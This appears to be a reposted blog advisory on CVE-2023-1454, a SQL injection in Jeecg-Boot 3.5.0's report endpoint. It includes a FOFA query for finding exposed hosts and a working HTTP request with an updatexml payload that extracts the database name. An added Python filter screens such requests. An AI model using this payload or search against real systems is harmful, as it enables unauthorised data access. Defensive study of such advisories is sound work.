Jeecg-Boot has a foreground SQL injection vulnerability (CVE-2023-1454)

1. Introduction to Jeecg-Boot

JeecgBoot is a low-code platform based on BPM. It uses a front-end/back-end separated architecture built on SpringBoot 2.x, SpringCloud, Ant Design & Vue, Mybatis-plus, Shiro and JWT, and supports microservices. Its code generator produces front-end and back-end code in one click. JeecgBoot follows a low-code development flow of OnlineCoding -> code generator -> manual MERGE, helping Java projects eliminate 70% of repetitive work so that development can focus on business logic, improving efficiency and saving R&D costs while keeping flexibility. Its low-code capabilities include online forms, online reports, online charts, form design, process design, report design, large screen design, etc.

2. Vulnerability description

jeecg-boot version 3.5.0 contains a SQL injection vulnerability. It is caused by a security flaw in the file jmreport/qurestSql, which allows SQL injection through the parameter apiSelectId.
CVE-2023-1454
CNNVD-202303-1399

3. Affected versions

jeecg-boot version 3.5.0

4. FOFA query

body="jeecg-boot"

5. Vulnerability reproduction

Request packet

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 126

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}

The database name is successfully extracted.

7. Remediation

At present, the vendor has not released any fix for this security problem. Users of this software are advised to watch the vendor's homepage or the reference URL for solutions:
https://github.com/jeecgboot/jeecg-boot
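
While no vendor fix is available, requests to this endpoint can be screened at a reverse proxy or in a log pipeline. The check below is an added example, not code from the original post or from the Jeecg-Boot project. It assumes that legitimate apiSelectId and id values are purely numeric, as the apiSelectId in the request above is, and the function and constant names are hypothetical.

```python
import json
import re

ENDPOINT = "/jmreport/qurestSql"        # endpoint named in the advisory
CHECKED_FIELDS = ("apiSelectId", "id")  # fields in the published request
# Assumption: legitimate values are numeric ids such as 1316997232402231298.
NUMERIC_ID = re.compile(r"\d{1,32}")
# Tokens common in error-based injection; used only to annotate the alert.
SQL_HINTS = re.compile(r"updatexml|extractvalue|\bselect\b|\bunion\b|'|--|/\*", re.I)

# Constructed sample bodies: the request shown above and a benign variant.
PUBLISHED_BODY = json.dumps({
    "apiSelectId": "1316997232402231298",
    "id": "1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '",
})
BENIGN_BODY = json.dumps({"apiSelectId": "1316997232402231298", "id": "1"})


def inspect_request(method, path, body):
    """Return (verdict, reasons); verdict is 'ignore', 'allow' or 'block'."""
    # Drop the query string and any ';' path parameters before matching.
    clean_path = re.split(r"[?;]", path, maxsplit=1)[0].rstrip("/")
    if method.upper() != "POST" or not clean_path.endswith(ENDPOINT):
        return "ignore", []
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return "block", ["body is not valid JSON"]
    if not isinstance(data, dict):
        return "block", ["body is not a JSON object"]
    reasons = []
    for field in CHECKED_FIELDS:
        if field not in data:
            continue
        value = data[field]
        # Accept JSON integers as well as digit-only strings.
        if isinstance(value, int) and not isinstance(value, bool):
            value = str(value)
        if not (isinstance(value, str) and NUMERIC_ID.fullmatch(value)):
            hint = " (SQL syntax present)" if SQL_HINTS.search(str(value)) else ""
            reasons.append(f"{field} is not a numeric id{hint}")
    return ("block", reasons) if reasons else ("allow", [])


if __name__ == "__main__":
    for name, body in (("published", PUBLISHED_BODY), ("benign", BENIGN_BODY)):
        print(name, inspect_request("POST", "/jeecg-boot" + ENDPOINT, body))
```

The allow-list decides the verdict and the keyword pattern only labels it, so an obfuscated payload is still rejected for not being numeric. The screening component must normalize paths the same way the application does, otherwise the endpoint match can be bypassed.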

Origin blog.csdn.net/nnn2188185/article/details/130067884